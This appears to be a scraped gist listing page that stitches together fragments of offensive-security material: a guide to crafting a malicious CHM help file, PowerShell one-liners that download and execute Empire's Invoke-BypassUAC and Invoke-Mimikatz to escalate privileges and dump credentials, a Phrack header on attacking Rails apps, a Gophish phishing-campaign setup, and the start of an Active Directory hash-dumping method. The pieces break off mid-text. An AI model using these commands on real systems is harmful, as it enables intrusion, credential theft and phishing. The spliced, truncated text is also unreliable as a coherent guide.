@cmdsecure
cmdsecure / Malicious-CHM-Guide.md
Created November 27, 2021 23:23 — forked from mgeeky/Malicious-CHM-Guide.md
CheatSheet describing how to create a malicious CHM file by hand (another approach is to use Nishang's Out-Chm scriptlet).

Procedure for generating Malicious CHM file

  • Step 0: Download and install Microsoft HTML Help Workshop and Documentation
  • Step 1: Obtain a valid CHM file and unpack it using 7-zip
  • Step 2: Find an entry-point HTML file within "docs" directory and insert the following code into its <body> section:
<OBJECT id=x classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1>
# Description:
# Collection of PowerShell one-liners for red teamers and penetration testers to use at various stages of testing.
# Invoke-BypassUAC and start PowerShell prompt as Administrator [Or replace to run any other command]
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/privesc/Invoke-BypassUAC.ps1');Invoke-BypassUAC -Command 'start powershell.exe'"
# Invoke-Mimikatz: Dump credentials from memory
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds"
# Import Mimikatz Module to run further commands
==Phrack Inc.==
Volume 0x0f, Issue 0x45, Phile #0x0c of 0x10
|=-----------------------------------------------------------------------=|
|=--------------=[ Attacking Ruby on Rails Applications ]=---------------=|
|=-----------------------------------------------------------------------=|
|=---------------------=[ joernchen of Phenoelit ]=----------------------=|
|=---------------------=[ joernchen@phenoelit.de ]=----------------------=|
|=-----------------------------------------------------------------------=|

Red Team Phishing with Gophish

This guide will help you set up a red team phishing infrastructure as well as create, perform and evaluate a phishing campaign. This is the basic lifecycle of your phishing campaign:

+---------------------+
|Get Hardware         |   Order / setup a vServer
+---------------------+
+---------------------+
|Setup                |   Install Gophish & Mail Server
+---------------------+
@cmdsecure
cmdsecure / Active_Directory_dump_n_crack.md
Created March 8, 2019 11:10 — forked from 7MinSec/Active_Directory_dump_n_crack.md
Active Directory hash dump n' crack methodology

Creating AD backup dump of user accounts and hashes

Upgrade to latest version of PowerShell

Check your version with:

$Psversiontable.psversion

If you are below Major: 5, Minor: 1, head to Microsoft's download site to get the latest.